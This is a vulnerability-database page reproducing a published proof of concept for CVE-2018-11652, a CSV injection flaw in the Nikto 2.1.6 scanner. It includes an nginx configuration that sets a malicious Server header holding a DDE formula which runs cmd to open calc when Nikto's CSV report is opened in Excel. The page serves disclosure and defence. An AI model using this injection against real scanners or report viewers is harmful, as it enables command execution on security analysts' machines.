Vulners
Lucene search
Nikto 2.1.6 CSV Injection
🗓️ 18 Jun 2018 00:00:00Reported by Adam GreenhillType 
packetstorm🔗 packetstormsecurity.com👁 38 Views
| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
 | Nikto 2.1.6 - CSV Injection Vulnerability | 18 Jun 201800:00 | – | zdt |
 | CVE-2018-11652 | 1 Jun 201815:00 | – | alpinelinux |
 | The vulnerability of the Nikto web application security scanner lies in the lack of mechanisms to neutralize special elements in the input commands of the operating system. This allows attackers to execute arbitrary commands on the operating system. | 27 Jul 201800:00 | – | bdu_fstec |
 | Nikto CSV Injection Vulnerability (CNVD-2018-16264) | 28 Jun 201800:00 | – | cnvd |
 | Nikto CSV Injection Remote Code Execution (CVE-2018-11652) | 20 Jun 201800:00 | – | checkpoint_advisories |
 | CVE-2018-11652 | 1 Jun 201815:00 | – | cve |
 | CVE-2018-11652 | 1 Jun 201815:00 | – | cvelist |
 | CVE-2018-11652 | 1 Jun 201815:00 | – | debiancve |
 | Nikto 2.1.6 - CSV Injection | 18 Jun 201800:00 | – | exploitdb |
 | Nikto 2.1.6 - CSV Injection | 18 Jun 201800:00 | – | exploitpack |
10
`# Exploit Title: Nikto 2.1.6 - CSV Injection
# Google Dork: N/A
# Date: 2018-06-01
# Exploit Author: Adam Greenhill
# Vendor Homepage: https://cirt.net/Nikto2
# Software Link: https://github.com/sullo/nikto
# Affected Version: 2.1.6, 2.1.5
# Category: Applications
# Tested on: Kali Linux 4.14 x64
# CVE : CVE-2018-11652
# Technical Description:
# CSV Injection vulnerability in Nikto 2.1.6 and earlier allows remote attackers
# to inject arbitrary OS commands via the Server field in an HTTP response header,
# which is directly injected into a CSV report.
# PoC
# Install nginx and nginx-extras: apt-get install -y nginx nginx-extras
# Configure the nginx server as follows by editing the /etc/nginx/nginx.conf file:
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
# multi_accept on;
}
http {
server_tokens off; # removed pound sign
more_set_headers "Server: =cmd|' /C calc'!'A1'";
server {
listen 80;
server_name localhost;
location /hello {
return 200 "hello world";
}
}
}
# Restart the server: service nginx restart
# Scan the nginx server with Nikto configured to output the results to a CSV file:
nikto -h <nginx address>:80 -o vuln.csv
# Open the resulting CSV file in Microsoft Excel and observe that CMD is attempting
# to execute
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
18 Jun 2018 00:00Current
9.5High risk
Vulners AI Score9.5
EPSS0.24727